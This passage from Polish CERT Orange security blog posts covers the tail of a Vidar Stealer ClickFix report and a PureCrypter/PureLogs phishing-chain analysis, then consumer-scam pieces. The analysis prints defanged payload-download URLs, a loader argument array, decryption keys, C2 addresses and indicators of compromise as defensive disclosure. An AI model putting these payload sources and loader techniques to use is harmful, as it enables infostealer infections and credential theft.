Analizowany plik w swoich metadanych podszywał się pod narzędzie firmy Exodus Movement, Inc. Jest to amerykańska firma technologiczna działająca od 2015 r., która stworzyła Exodus Wallet – wieloassetowy, bezpośredni portfel kryptowalutowy, działający na desktopie, urządzeniach mobilnych oraz w przeglądarce. Firma jest notowana na nowojorskiej giełdzie od 18 grudnia 2024. Obecnie uznana jest za renomowanego dostawcę oprogramowania portfela, umożliwiającego bezpieczne przechowywanie, wymianę i zakup kryptowalut. Dzięki rozbudowanemu ekosystemowi (swap, staking, NFT, on‑ramps, Passkeys), firma stawia na self-custody, prostotę obsługi i integracje z dużymi partnerami jak Ledger czy Blockchain.com.

Rys. 15. Metadane bliku build.exe.

Plik ten pojawił się w atakach 2025-06-22 21:58:34 UTC (znacznik czasowy pierwszej identyfikacji w portalu Virustotal). Jednak sama wersje Vidara była przygotowana wcześniej – podpis elektroniczny 2025-04-18 15:55:00 UTC. Podpis nie jest poprawny, niemniej sama jego obecność poprzez “doklejenie” potrafi oszukać niektóre silniki antywirusowe.

Rys. 16. Kanał Telegrama, z którym łączy się Vidar.

Rys. 17. Profil Steam, z którego pobierany jest adres C2 serwera.

Vidar Stealer pozostaje aktywnym i rozwijającym się infostealerem działającym w modelu Malware‑as‑a‑Service (MaaS). Jego dystrybucja, technologia i mechanizmy unikania wykrycia ewoluują od czasu. gdy powstał w 2018 roku. Obecnie ceny za licencję wahają się od ok. 250 USD (wersja podstawowa) do 700 USD (wersja PRO) i obejmują dostęp do panelu zarządzania, gdzie operatorzy mogą konfigurować moduły i serwery C2.

W najnowszym Vidar Stealerze zidentyfikowano liczne funkcjonalności:

• kradzież haseł, ciasteczek i danych formularzy z przeglądarek
• pozyskiwanie danych uwierzytelniających do portfeli kryptowalut (np. BraveWallet, MetaMask i innych rozszerzeń) poprzez analizę JSONów i plików wallet.dat
• eksfiltracja tokenów sesyjnych z aplikacji takich jak Steam, Telegram, Discord
• grabber plików z dysków lokalnych i wymiennych, np. dokumentów, %APPDATA%, ProgramData
• opcja samoniszczącego się loadera („non-resident loader”), oraz wariantu tworzącego persystencję („resident loader”) przez wpisy w Rejestrze lub folderze autostartu

Komunikacja z C2 odbywa się przez HTTP/HTTPS, często z użyciem pośredników takich jak Mastodon, Telegram czy Steam, wstawiających adresy serwerów w opisach profili (technika tzw. „social media C2 resolver”). Dane są pakowane do formatu RAR (lub ZIP), kodowane Base64 i wysyłane w żądaniach POST razem z metadanymi konfiguracji C2.

Można stwierdzić, że Vidar Stealer w 2025 roku nie tylko pozostaje aktywny, ale ewoluuje. Wzbogaca scenariusze infekcji, stosuje techniki kamuflażu binariów i zaawansowane metody unikania wykrycia. Szczególną uwagę należy zwrócić na nowsze podejście, takie jak Steam, czy malware‑masked narzędzia oraz pakowane instalatory omijające sandboxy.

Obserwowana kampania pokazuje, że operatorzy Vidar Stealera sięgają po najnowsze trendy i do dystrybucji wykorzystują opisaną technikę ClickFix. W przypadku Vidara ClickFix jest stosowany głównie w scenariuszach malvertisingowych i fałszywych aktualizacji. Atakujący, wykorzystując słabości w innych serwisach WWW, wstrzyknęli swoją stronę udającą weryfikację CAPTCHA w wiele legalnych stron. Następnie przekierowywali potencjalne ofiary na te strony, gdzie licząc na ich determinację i wykonanie poleceń rozpoczynali infekcję.

IoC

Przejęte serwisy:
www.banita.travel[.]pl/wp-assets-optimizer.html
www.talantainvestments[.]com/wp-assets-optimizer.html          
haagcommunications[.]com/wp-assets-optimizer.html                   
www.drewtrans[.]pl/wp-assets-optimizer.html
gem.snhu[.]edu/wp-assets-optimizer.html            
www.rocketcitymom[.]com/wp-assets-optimizer.html                     
www.mbu[.]edu/wp-assets-optimizer.html               
motorweek[.]org/wp-assets-optimizer.html                        
schoolsmakemadison[.]org/wp-assets-optimizer.html                   
breakthrough3x[.]com/wp-assets-optimizer.html             
mobileecosystemforum[.]com/wp-assets-optimizer.html              
zenstudios[.]com/wp-assets-optimizer.html                      
www.livingearth[.]net/wp-assets-optimizer.html           
www.perkinseastman[.]com/wp-assets-optimizer.html

Domeny
was-logistics[.]com

IP
195.10.205[.]75
5.252.153[.]72
116.202.176[.]52 (Vidar C2)

URL
hxxps://t[.]me/l07tp
hxxps://f3.xo.mastermaths.com[.]sg
hxxps://b2.xs.mastermaths.com[.]sg
hxxps://steamcommunity[.]com/profiles/76561199869630181

Pliki
wp.ps1
03286fa30d368dd9808703a4b289cf66195944420fdbb2cdf9a4d82b23743c75

yrp5.rar
9275a847d7e5cf2e9b1d7e0a6eb5b9be042a51ce9af4c3d290d8575dc2f11c73

yrp5.txt
d01ba1a71d3a7d5eb4844a3b15089b2954cf10fefd6c7c93ba452bb6f38007a4

reacter.rar
bebe595ef029c7a6ac9c846eb4ac7aa348ea244d7e984f50b87d0a17b0af5224

build.exe (Vidar Stealer)
48835e009c8550b6681ae37d7b55d8e81aca78bbb3685acd02820cc85a5fb875

Vidar Botnet: bfe4251bf4f41a63c183f3cf7858790c 

Współpraca Ireneusz Tarnowski

The post Zainfekuj się sam – kampania ClickFix appeared first on CERT Orange.

W czerwcu 2025  zaobserwowano profesjonalnie zorganizowaną kampanię malspamową, ukierunkowaną na podmioty korporacyjne w Europie (w tym w Polsce, Niemczech i Włoszech). Atak rozpoczął się od spreparowanych wiadomości e-mail zawierających załączniki .xls z osadzonymi obiektami OLE. Otwarcie załącznika prowadziło do pobrania dokumentu .doc z aktywnym makrem, inicjujących łańcuch infekcji. Obejmował on m.in. skrypt VBS, Powershell, technikę steganografii (ukrycie payloadu w obrazie .jpg), oraz wstrzyknięcie binarnego komponentu PureCrypter do procesu systemowego.

PureCrypter pełnił funkcję loadera .NET, zaopatrzonego w zaszyfrowany konfigurator oparty na Protobuf. Finalnie infekcja kończyła się uruchomieniem PureLogs Stealera, zbierającego dane z przeglądarek, hasła i informacje systemowe, a następnie przesyłającego je do serwera C2 zlokalizowanego na nietypowym porcie (20012).

Kampania charakteryzuje się wysokim stopniem ukrycia dzięki wykorzystaniu legalnych serwisów chmurowych (Pastefy, skracacze linków), technik in-memory injection, wieloetapowej obfuskacji oraz unikalnym ciągom znaczników (INICIO>> <<FIM) stosowanym w stego-loaderze. PureCrypter wcześniej pełnił rolę loadera do rozprzestrzeniania popularnych rodzin złośliwego oprogramowania typu AgentTesla, Remcos, RedLine i LokiBot. Jednak w analizowanej kampanii atakujący wykorzystali autorskie oprogramowanie, techniki steganograficzne i wspominane wyżej zewnętrzne platformy stagingowe, co świadczy o wysokim stopniu profesjonalizacji i szerokim wachlarzu metod unikania detekcji.

Od phishingu…

Atak rozpoczyna się od wiadomości e-mail o temacie związanym ze współpracą biznesową (zamówienia lub oferty). Treść wiadomości napisana jest w lokalnym języku potencjalnej ofiary (polskim, niemieckim lub włoskim), a nadawcy podszywają się pod istniejące firmy. Firma, pod którą podszył się nadawca, nie ma nic wspólnego z phishingiem, de facto również będąc jego ofiarą.

Rysunek 1. Wiadomość e-mail z malspamem

Przy analizie nagłówków warto zwrócić szczególną uwagę na argument X-Originating-IP. To pole, często automatycznie dodawane przez serwery pocztowe (zwłaszcza Microsoft Exchange lub Zimbra), wskazuje rzeczywisty adres IP, z którego nadawca połączył się z serwerem SMTP w celu wysłania wiadomości.

Tabela 1. Adresacja źródłowa z której następowała wysyłka malspamu

Oba adresy należą do operatorów usług VPS – odpowiednio Hyonix (USA, Kalifornia) oraz BlueVPS OU (działający m.in. w Polsce i Estonii). To dostawcy tanich ogólnodostępnych serwerów wirtualnych, wykorzystywanych często do działań o niskiej reputacji, jak spam, phishing czy dystrybucja złośliwego oprogramowania. Co istotne, żaden z tych adresów IP nie ma rzeczywistego powiązania z domenami, które pojawiają się w polu nadawcy wiadomości (mail.skieresdge.com oraz mail.intlsgin.com). Obie domeny posiadają publicznie dostępne serwery pocztowe z zainstalowanym oprogramowaniem Zimbra Collaboration Suite i – niestety – otwartym panelem logowania. Tego typu konfiguracja (szczególnie w przypadku instancji Zimbry) stanowi poważną lukę operacyjną. Publiczne interfejsy logowania są nie tylko łatwe do wykrycia za pomocą wyszukiwarek typu Shodan, ale również często stają się celem ataków typu brute-force, credential stuffing lub eksploitacji znanych podatności (np. CVE-2022-41352, CVE-2023-37580).

…przez łańcuch infekcji…

Po otwarciu dokumentu Excel (Zamówienie_nr_N261824.xls) użytkownik widzi arkusz z pozornie zwykłymi danymi zamówienia. W rzeczywistości plik zawiera ukryty obiekt OLE osadzony w komórce lub pod przyciskiem, odwołujący się do zewnętrznego adresu URL:

hxxps://givenbestthingswithgreatenssgifromthegodtogivemebestthignswithgreans[.]business@acessaurl[.]com/t4AiJaq

Interakcja z dokumentem inicjuje pobranie pliku Word (bestthingswithgreatsupportingincomeforme.doc) z zewnętrznej adresacji na którą przekierowuje skracacz linków – acessaurl.com. Plik zawiera makro VBA, uruchamiające zewnętrzny skrypt .vbe.

Infrastruktura wykorzystywana do hostowania dokumentów wykazuje typowe cechy tymczasowego, jednorazowego stagingu malware: tania, nieszyfrowana, publicznie dostępna, pozbawiona zabezpieczeń katalogowych, bez certyfikatów SSL i zarejestrowanej domeny. Takie środowisko jest charakterystyczne dla kampanii masowych, gdzie liczy się szybkość dystrybucji i rotacji komponentów, a nie trwałość infrastruktury.

Rysunek 2. Zdekodowany skrypt powershell

Skrypt .vbe zakodowany w Base64, używa obiektu WebClient do pobrania danych z adresu URL (hxxp://104[.]168[.]5[.]23/xampp/cx/new_image.jpg). Kod szuka pozycji początkowego i końcowego znacznika w pobranym obrazie. Jeśli znaczniki istnieją i są we właściwej kolejności, Substring wycina tylko to, co jest między <<INICIO>> i <<FIM>>, i przypisuje do $breathalyze. Następnie wykonuje akcję Replace na wyodrębnionym stringu, podmieniając znak „@” na literę „A”, by na koniec załadować zdekodowane dane jako zestaw .NET (Assembly).

Uruchomiony w ten sposób malware to loader, który wykorzystując funkcje VAI deszyfruje zewnętrzny payload i uruchamia, zgodnie z tablicą obiektów zdefiniowaną w sterującym powershellu:

[object[]]@($parachute,”,”,”,’aspnet_compiler’,”,”,’C:\Users\Public\Downloads’,’bonzian’,’vbscript’,”,’swindling’,’2′,”,”)

Gdzie zmienna $parachute zawiera link prowadzący do zakodowanego w Base64 payloadu właściwego PureCryptera:

hxxps://pastefy[.]app/DY7oIDgl\raw

…VAI loadera…

Plik loadera, który przyjmuje adres URL oraz nazwę docelowego procesu jako argumenty, pobiera plik zakodowany w odwróconym base64. Po jego zdekodowaniu otrzymujemy kolejny etap ładunku.

Funkcja VAI odpowiada za środkowy, kluczowy etap łańcucha infekcji, w którym malware odbiera zestaw parametrów konfiguracyjnych i przekształca je w konkretne działania operacyjne. Działa ona jak kontrolowany loader, który na podstawie przekazanych argumentów decyduje o dalszym zachowaniu zagrożenia.

Rysunek 3. Funkcja VAI wczytująca kolejny payload

Parametry pozwalają dodać złośliwy komponent do harmonogramu zadań systemowych Windows. Dzięki temu zostanie on automatycznie uruchomiony cyklicznie lub przy starcie systemu. Mogą one również dodać odpowiedni wpis do rejestru systemowego, by zapewnić trwałość i możliwość uruchomienia przy każdym logowaniu użytkownika. Jeżeli parametr dotyczący natychmiastowego wykonania jest aktywny, VAI lokalnie uruchamia wskazany plik.

W kolejnym kroku funkcja przechodzi do głównego celu – pobrania zakodowanego ciągu danych z internetu z wykorzystaniem podanego adresu URL. Zawartość zakodowaną w formacie base64 dekoduje i konwertuje na tablicę bajtów. W dalszej części ta tablica zawiera zaszyfrowany i najprawdopodobniej również skompresowany obiekt binarny (tzw. blob), stanowiący kolejny etap ładunku. Funkcja identyfikuje format danych i przekazuje je do dedykowanych komponentów, dokonujących ich deszyfrowania i dekompresji. Zależnie od typu danych (kod natywny, czy .NET), są one uruchamiane odpowiednio za pomocą refleksji (Assembly.Load) lub dedykowanych metod ładowania kodu natywnego w pamięci.

W ten sposób VAI nie tylko konfiguruje trwałość złośliwego komponentu, ale również pełni funkcję dynamicznego pobierania i wykonywania kolejnego etapu infekcji, całkowicie zależnego od zewnętrznych parametrów. Dzięki temu złośliwe oprogramowanie zyskuje elastyczność i może być łatwo rekonfigurowane przez atakującego bez konieczności jego rekompilacji.

…pojawia się PureCrypt

Opisywany kod to klasyczny przykład złośliwego .NET loadera, który umożliwia bezplikowe uruchomienie zakodowanego i zaszyfrowanego złośliwego komponentu. Cały proces zaczyna się od metody Program.Main(), która próbuje wywołać funkcję KupWWV1uV() z klasy rBY5059SY9DdyjgEZ0. Wywołanie to obudowane jest w pusty blok try-catch, co sprawia, że wszelkie wyjątki zostaną zignorowane. Technika ta ma na celu utrudnienie analizy dynamicznej oraz uniknięcie awarii programu przy błędach wykonania.

Rysunek 4. Główna funkcja wczytująca kod

Metoda KupWWV1uV() rozpoczyna działanie od pobrania danych bajtowych przy pomocy jLYmVgD6t1MlJI8Oxx.jj8k0Dp6E(). To właśnie tu znajduje się główna logika ładowania zakodowanego payloadu. Metoda jj8k0Dp6E() łączy dwa etapy przetwarzania: najpierw odszyfrowuje dane przy pomocy metody xdiBAU3s3(byte[]), by następnie zdekompresować je z użyciem NDRQmnL6E(byte[]).

Rysunek 5. Funkcja odszyfrująca następny złośliwy kod

Funkcja xdiBAU3s3() używa algorytmu AES-256-CBC z kluczem i wektorem inicjalizacyjnym zakodowanymi w base64 (enSz5coATVaFc6Dy0r9Bh85Hl7Qkf6MXs75mqNPPcK4= i k3yX8D3SQNwL6kJ9FxAn3Q==). Dane te są deszyfrowywane z użyciem CryptoStream, co oznacza, że po ich przetworzeniu otrzymujemy bufor skompresowany przy pomocy GZIP.

Kolejny krok, NDRQmnL6E(), próbuje rozpakować ten bufor przy pomocy GZipStream. Jeśli nagłówki danych są prawidłowe, proces kończy się sukcesem i otrzymujemy pełną, zdekompresowaną tablicę bajtów reprezentującą prawdopodobnie skompilowane złośliwe Assembly.

Wracając do KupWWV1uV(). Po tej tablicy bajtów jest ona ładowana do pamięci metodą Assembly.Load(array). Następnie program wyszukuje konkretny typ w załadowanym assembly — g2ULNNA1SBTl1txVBI.pnyUJi3CqvYiRT7aqd, a z niego metodę D7kZ51UqC, którą próbuje wywołać jako delegata typu Action. To oznacza, że faktyczny złośliwy kod wykonywany jest dynamicznie, bez zapisywania plików na dysku, co pozwala skutecznie ominąć wiele mechanizmów ochronnych.

Całość kodu, od deszyfrowania przez dekompresję po uruchomienie, jest maksymalnie ukryta i odporna na błędy, dzięki licznym zabezpieczeniom try-catch oraz wykorzystaniu zaciemnionych nazw. Wskazuje to, że mamy do czynienia z loaderem malware’u, wykorzystywanym do uruchamiania dalszego payloadu w pamięci ofiary — bez zostawiania śladów na dysku.

Loader wyposażony jest też w moduły sprawdzające uruchamianie w środowisku wirtualnym, co ma na celu uniknięcie analizy lub działania w sandboxie. Sprawdzane są typowe nazwy plików, urządzeń, procesów lub wartości WMI powiązane z maszynami wirtualnymi i sandboxami. Weryfikowana jest też rozdzielczość ekranu. Wirtualne maszyny często mają bowiem bardzo typowe, „dziwne” rozdzielczości (np. 1024×768, 1280×1024, 1440×900, 800×600). Jeśli loader wykryje taki rozmiar, zgłasza obecność VM. Dodatkowo funkcja antydebugowa iteruje po modułach/procesach, sprawdzając obecność narzędzi typu debugger/monitor. Jeżeli środowisko nie zostanie zakwalifikowane jako podejrzane, funkcja przechodzi do dalszych etapów, które zależą od wartości przekazanych argumentów.

Od C# Loadera do PureLogs Stealera

Loader odpowiada za uruchomienie złośliwego oprogramowania bezpośrednio w pamięci komputera. Rejestruje wtedy własny uchwyt zdarzenia odpowiedzialnego za obsługę zasobów aplikacji. Polega on na przechwyceniu każdego żądania dotyczącego załadowania zasobu DLL i przekierowaniu go do własnej implementacji. Dzięki temu, gdy aplikacja lub inny komponent systemu poprosi o dostęp do zasobu, loader jest w stanie dynamicznie przygotować odpowiednią odpowiedź w postaci zdekompresowanego i zdekodowanego złośliwego assembly.

Najważniejszym etapem działania loadera jest wyodrębnienie zakodowanego bloku bajtów z sekcji zasobów programu. Blob ten jest celowo zaszyfrowany i dodatkowo skompresowany, by utrudnić jego analizę. W praktyce kod loadera realizuje najpierw proces deszyfrowania przy użyciu prostych operacji na bajtach takich jak XOR, by następnie przeprowadzić dekompresję danych z wykorzystaniem algorytmu Deflate. Po zakończeniu loader uzyskuje oryginalną bibliotekę DLL PureLogs Stealer w postaci tablicy bajtów.

Załadowany w ten sposób plik jest przekazywany do funkcji odpowiedzialnej za dynamiczne ładowanie assembly w pamięci. Proces ten polega na wywołaniu metody Assembly.Load która pozwala uruchomić kod bez konieczności zapisywania pliku na dysku. To jeden z najbardziej popularnych sposobów omijania zabezpieczeń antywirusowych, ponieważ wiele narzędzi ochronnych opiera się na monitorowaniu operacji na plikach a nie na bezpośredniej analizie pamięci.

Kod loadera charakteryzuje się bardzo wysokim poziomem zaciemnienia. Praktycznie każda metoda i zmienna posiadają losowo wygenerowaną nazwę, która nie sugeruje jej prawdziwego przeznaczenia. Dodatkowo proces przetwarzania danych jest podzielony na wiele drobnych funkcji zawierających setki warunków oraz pozornie zbędnych operacji. Ich celem jest zmylenie zarówno analityka jak i automatycznych narzędzi do analizy kodu. Zastosowane są także tzw. „sztuczne ścieżki” wykonania programu które nie mają żadnego wpływu na efekt końcowy, lecz utrudniają zrozumienie przepływu danych.

Rysunek 6. Łańcuch infekcji w badanej kampanii

Pora na kradzież

Po załadowaniu do pamięci PureLogs Stealer przechodzi do właściwej szkodliwej działalności. Moduł ten iteruje przez wiele funkcji, których celem jest kradzież wrażliwych danych z systemu. Złośliwe oprogramowanie zbiera:

• dane z przeglądarek internetowych (w tym również rozszerzenia),
• informacje dotyczące portfeli kryptowalutowych,
• pełne dane identyfikujące użytkownika,
• szczegółowe dane o konfiguracji sprzętowej komputera.

Zebrane w ten sposób dane są serializowane (przekształcane do jednego, zwartego formatu), a następnie poddawane kompresji i szyfrowane za pomocą algorytmu 3DES z wykorzystaniem predefiniowanego klucza. Dopiero w tym momencie są przesyłane do serwera kontrolowanego przez cyberprzestępców.

Rysunek 7. Zidentyfikowane próbki nawiązujące połączenia do C2

Adres serwera Command and Control (C2) znajduje się w adresacji polskiej firmy hostingowej MEVSPACE sp. z o.o. i stanowi aktywną infrastrukturę powiązaną z PureLogs. Dodatkowa weryfikacja wykazała, że serwer obsługuje liczne warianty złośliwego oprogramowania – przede wszystkim pliki wykonywalne EXE, ale także archiwa RAR, obrazy ISO oraz dokumenty RTF i DOC. Zróżnicowanie formatów i nazw plików wskazuje na szeroko zakrojone kampanie phishingowe, wykorzystujące typowe załączniki biurowe, mające skłonić ofiary do uruchomienia szkodliwego kodu. Pliki komunikujące się z tą infrastrukturą wykrywane są niemal codziennie przez większość silników antywirusowych, co świadczy o dużej skali zagrożenia oraz ciągłym rozwoju i aktualizacji narzędzi wykorzystywanych przez operatorów PureLogs. Regularność pojawiania się nowych próbek, wysoka wykrywalność oraz różnorodność stosowanych wektorów infekcji potwierdzają, że serwer ten jest intensywnie wykorzystywany do dystrybucji i kontroli złośliwego oprogramowania, stanowiąc realne i aktywne zagrożenie dla użytkowników oraz firm w Polsce i poza jej granicami.

Skąd wziął się PureCrypter, czyli profil aktora

Rysunek 8. Pure Coder Shop na Telegramie

Narzędzia z rodziny „Pure” są przypisywane programiście działającemu pod pseudonimem „PureCoder”. Ich sprzedaż rozpoczęła się w marcu 2021 lub wcześniej.

PureCoder oferuje cały pakiet złośliwych narzędzi, które są dystrybuowane za pośrednictwem zautomatyzowanego bota Telegram (@Purecoder_shopbot). Oferta obejmuje różnorodne komponenty malware’u, sprzedawane pod pretekstem edukacyjnego lub testowego zastosowania, jednak ich realne wykorzystanie wskazuje na zorganizowaną dystrybucję narzędzi przestępczych. W skład zestawu wchodzą:

1. PureCrypter – główny crypter/loader, umożliwiający pakowanie i maskowanie złośliwego kodu z zaawansowanymi mechanizmami omijania zabezpieczeń.
2. Pure Miner – komponent odpowiedzialny za ukryte kopanie kryptowalut na zainfekowanych systemach.
3. Pure RAT (Remote Access Trojan) – narzędzie umożliwiające zdalne przejęcie kontroli nad systemem ofiary.
4. Pure Logs Stealer – moduł do kradzieży danych logowania i plików cookie z przeglądarek internetowych.
5. Pure Clipper – złośliwe oprogramowanie zamieniające adresy portfeli kryptowalut w schowku systemowym na własne.
6. Blue Loader – najprawdopodobniej narzędzie typu loader, służące do pierwszego etapu infekcji lub dogrywania dodatkowych ładunków.

Każdy z tych komponentów oferowany jest w ramach scentralizowanego systemu zakupów i aktualizacji przez Telegram. Automatyzacja procesu dystrybucji świadczy o wysokim stopniu profesjonalizacji i adaptacji technik cyberprzestępczych do modeli usługowych typu MaaS (Malware-as-a-Service).

Rysunek 9 – PureCrypter Builder

PureCrypter jest dostępny w formie buildera oferującego szeroki wachlarz funkcji: od wstrzykiwania ładunku (różne metody), poprzez mechanizmy utrzymywania trwałości (autostart), aż po techniki obejścia zabezpieczeń (m.in. anty-VM, unhooking DLL, opóźnienia wykonania). Builder zawiera zakładki wskazujące na dodatkowe moduły, jak Office Macro Builder i Downloader, co sugeruje ich użycie jako wektorów początkowej infekcji. Interfejs użytkownika umożliwia pakowanie plików EXE (30 razy na dobę) i skryptów (3 razy na dobę), co ogranicza nadużycia, jednocześnie ułatwiając operacje technicznie niedoświadczonym użytkownikom. PureCrypter wykorzystywany jest do dystrybucji licznych rodzin malware’u, w tym: AgentTesla, AsyncRAT, LokiBot, RedLine, Remcos i WarzoneRAT, a także własnych narzędzi autorskich opisywanych powyżej.

Sprzedawany jest na forach typu Hackforums[.]net w modelu subskrypcyjnym (od $159 za 3 miesiące do $799 dożywotnio). Sprzedaż wymaga akceptacji regulaminu (ToS), co ma na celu obejście regulaminów forów zakazujących sprzedaży malware’u. System płatności oparty jest na kryptowalutach (BTC), z wykorzystaniem wielu portfeli, prawdopodobnie powiązanych z mikserami (tj. usługami służącymi do zaciemniania ścieżki przepływu środków, poprzez mieszanie wielu transakcji i adresów, co utrudnia identyfikację źródła i celu przelewów) w celu zachowania jak największego stopnia anonimowości.

Rysunek 10 – Ceny PureCodera

TTP – Mitre ATT&CK

IOC

Email:

X-Originating-IP: 178[.]173[.]236[.]180

X-Originating-IP: 91[.]211[.]27[.]55

Tematy wiadomości:

AW: Bedbur GmbH Proforma-Bestellung#PO_0900493PO

Zapytanie ofertowe 100003456

I: Ordine cliente ORC-712

Zamówienie nr: N261824

Zamówienie - 25800/F01/2025

Pliki EML:

B45b75cc1f42c94036c732fcc5f2c80ccd8089466e53d95e6467c321c66bc1f1

Ad17909919ccd0f642478438c0de724e44cad4400b13afed33a7282a245d3924

78a7347d230eaba7cb4e80e93a4673ff58202269a6e0547ae275260497950f67

e8315a923b8721a4388b1c0a6d9cc620d2097f15d6d9fb0f59767c3ed1897d71

9c38533317c9d39eba97738a128869a6adf436250b129f1e5a908be306cc9f4d

Pliki XLS:

8089b7c218c42f25bcd0875183aec89f69174170d69d094ea6484d24d89d17ae

A72ce5f041cd20a2a32cff5a9b7784d6643ec3f9180df24d1bdcb22531e7da8b

8854814745ceb4f4b2fef5cdf982b5b10742cecb5b0be5e5f231075deab2e390

Pliki DOC:

63385244035146fced60005df765005ee454545eee82e920048de09f23717340

3f920a110cbbf200575a3ea6352a86adb199f345ca6704a68b4dd3290a3e71ef

01d1e30e7bcf02ba8abd492e3c6a8f885e8299f22dafbdd312d1f4dac0d7cfa4

Pliki VBE:

e5a91ff095c96c8fa91d95ccc9eb767269a40ebc2e68f9f1ce95ef9547a1b40f

1012821200c9bb5c411dec733cb3417ddacf3ed8751a464ed3e305ba37c7066b

0e4a887230b1c37fc6bb8fa7c8447129786e5f60d61dddd8d32105778c3705cf

Web:

Droppoints:

172[.]245[.]152[.]3

198[.]12[.]126[.]164

104[.]168[.]5[.]23

216[.]9[.]227[.]43

c2:

212[.]23[.]222[.]56:20012

The post PureCrypter atakuje (nie tylko) Polaków appeared first on CERT Orange.

Gdy w poszukiwaniu sieciowych oszustw trafiliśmy w sieci na podejrzany… papierowy list, temat mocno nas zaintrygował. Z jednej strony sami przyznacie, że na pierwszy rzut oka treść aż krzyczy: „Oszustwo!”. Z drugiej – dane widoczne w nagłówku dokumentu mogą sugerować, że mamy do czynienia z prawdziwą firmą.

Biznes legalny, ale… szczególny

I faktycznie, wszystko wydaje się być w porządku, przynajmniej pod względem formalnym. Domena istnieje od dwóch lat, jest zarejestrowana w Holandii. Ma wersję PL, a na niej adres pocztowy. Ale nie standardowy, tylko niderlandzką skrytkę pocztową. Faktyczny adres znajdujemy w regulaminie (wyłącznie w wersji ang.), w Eindhoven (Google Maps wskazują, że znajduje się tam siedziba innej, niepowiązanej firmy). Firmę znajdziemy też w europejskim rejestrze VAT oraz Holenderskiej Izbie Handlowej. Jeszcze raz – formalnie(!) wszystko jest w porządku.

W porządku na pierwszy rzut oka wydaje się też proces rozwiązywania umowy z wybranym usługodawcą za pośrednictwem wspomnianej firmy. Najpierw wybieramy dostawcę usługi. Są ich setki, wydaje się, że wszystkie – nawet te mniejsze – firmy z Polski. Wpisujemy nasze dane, treść listu z wypowiedzeniem umowy zmienia się na bieżąco na ekranie.

Po wybraniu usługi, z której chcemy zrezygnować, otrzymujemy też dużo (ok. 5000 znaków) informacji. Precyzują one na czym polega proces rozwiązania umowy, jakie działania deklaruje firma wypowiadająca w naszym imieniu umowę o świadczenie usług. Co więcej – znajdziemy tam też propozycję jak można rozwiązać umowę samemu, bez pośrednictwa. Skoro tyle jest w porządku, to co jest nie tak i dlaczego poświęcamy czas legalnej firmie?

85 złotych schowane w treści

Przede wszystkim fakt, że musimy za to zapłacić. Po zeskanowaniu widocznego na papierowym piśmie kodu QR trafiamy na stronę płatności. Mamy na niej dokument księgowy z wyszczególnionymi pozycjami i kwotami do zapłaty. Wśród sposobów płatności znajdziemy m.in. Przelewy24, BLIK, PayPal, czy oczywiście kartę kredytową. O jakich kosztach mówimy? Wysłanie pisma to 85 PLN, monit za niezapłaconą w ciągu 14 dni fakturę – 50 PLN.

Gwoli jasności – na stronie kwota 85 PLN za każde pismo wymieniona jest trzykrotnie, acz faktycznie wśród tysięcy znaków tekstu można tę informację przegapić. Efekt? Do internauty, który zignorował/nie zauważył maila trafi potem pokazany na początku listowny monit o zapłatę. A przeszukanie internetu pod kątem opinii na temat opisywanej firmy przynosi przede wszystkim pełne emocji „ostrzeżenia przed oszustami”, którzy „chcą ode mnie jakieś pieniądze!”.

Jakim cudem jednak klienci w ogóle trafiają na stronę tego typu firmy zamiast po prostu rozwiązać umowę za pośrednictwem dostawcy? W wyniku pracy specjalistów od SEO… Witryna jest bardzo mocno pozycjonowana w wyszukiwarkach i w przypadku gdy wpiszemy zwrotu „rezygnacja z usług”, „jak zrezygnować” i podobne, dodając nazwę usługi – bardzo często wyświetli się jako pierwsza. Jeszcze przed stroną usługodawcy!

Co bardzo ważne, firma nie wdrożyła żadnych dodatkowych zabezpieczeń, ograniczających ryzyko podszycia. Może się więc zdarzyć, że ktoś wpisze Twoje dane i w ramach kiepskiego żartu spróbuje rozwiązać umowę w Twoim imieniu. Wtedy nie dość, że czeka Cię dyskusja z usługodawcą to jeszcze konieczność opłacenia faktury w opisywanej firmie! Nierealne? Niewiele ponad dwa tygodnie temu dokładnie taką sytuację opisał fiński dziennik Iltalehti.

Czy działalność opisywanej firmy jest legalna? Tak. Czy zgodna z prawem? Wydaje się, że gdyby tak nie było, firma nie egzystowałaby od 8 lat w niderlandzkich rejestrach państwowych. Czy etyczna? Na to pytanie każdy może odpowiedzieć sobie sam. Czy wykorzystuje naszą niefrasobliwość, fakt że nie chce nam się czytać wielkich płacht zapełnionych treścią i że wszystkiego potrzebujemy „na szybko”, „na już”? Ależ oczywiście, wydaje się to być podstawą modelu biznesowego opisywanej firmy.

Jak rozwiązać umowę bez płacenia?

Przede wszystkim zastanowić się, czy nie lepiej robić to samemu. Przy założeniu, że nie rozwiązujecie umowy przed końcem „lojalki”, rezygnacja z usług jest darmowa! No i jeśli chcesz zrezygnować z usług jakiejś firmy, wejdź po prostu na jej stronę. Nie szukaj informacji w wyszukiwarce. Pamiętaj, że do tego, by wpłynąć na to, co widzisz w Google, wystarczy odpowiednia kwota pieniędzy.

W opisywanym przypadku stracisz 85 złotych, może 135 jeśli nie opłacisz faktury w ciągu 14 dni. Na naszych łamach przytaczaliśmy jednak sytuacje, gdy płatny ruch z wyszukiwarki prowadził do stron z fałszywymi aplikacjami, gdzie w efekcie ofiara instalowała na swoim komputerze groźnego trojana. Zawsze upewnij się, czy strona na którą wchodzisz to wynik wyszukiwania, czy płatna reklama.

A jeśli faktycznie wolisz, by ktoś wypowiedział umowę za Ciebie, przeczytaj dokładnie na co się zgadzasz. Być może konieczność opłaty sprawi, że zmienisz zdanie? Lub po prostu będziesz się spodziewać faktury, opłacisz ją w terminie, sprawa będzie zamknięta, umowa rozwiązana, zapomnisz o sprawie. Tylko zwróć uwagę na adres, pod który będzie wysłane wypowiedzenie. Bo akurat w przypadku, gdy wybierzesz Orange, pismo trafi do… Belgii. Umowy nie rozwiążesz, a fakturę zapłacić będzie trzeba.

The post Pomogą rozwiązać umowę? Jak uniknąć kosztownych kłopotów. appeared first on CERT Orange.

Oszustwo zaczyna się od rozmowy telefonicznej. W opisywanej kampanii najczęściej mieliśmy do czynienia z numerami z Wlk. Brytanii (strefa numeracyjna +44), zdarzyła się też próba połączenia z Holandii.

Po odebraniu telefonu odzywa się syntetyczny głos i… oferta pracy:

Interesuje Cię łatwa, wysokopłatna praca? Mam dla Ciebie ofertę, skontaktuj się ze mną przez WhatsApp

To tylko jeden z przykładów, treści mogą być różne, jednak niosą ten sam przekaz.

Wędka zarzucona przez WhatsApp

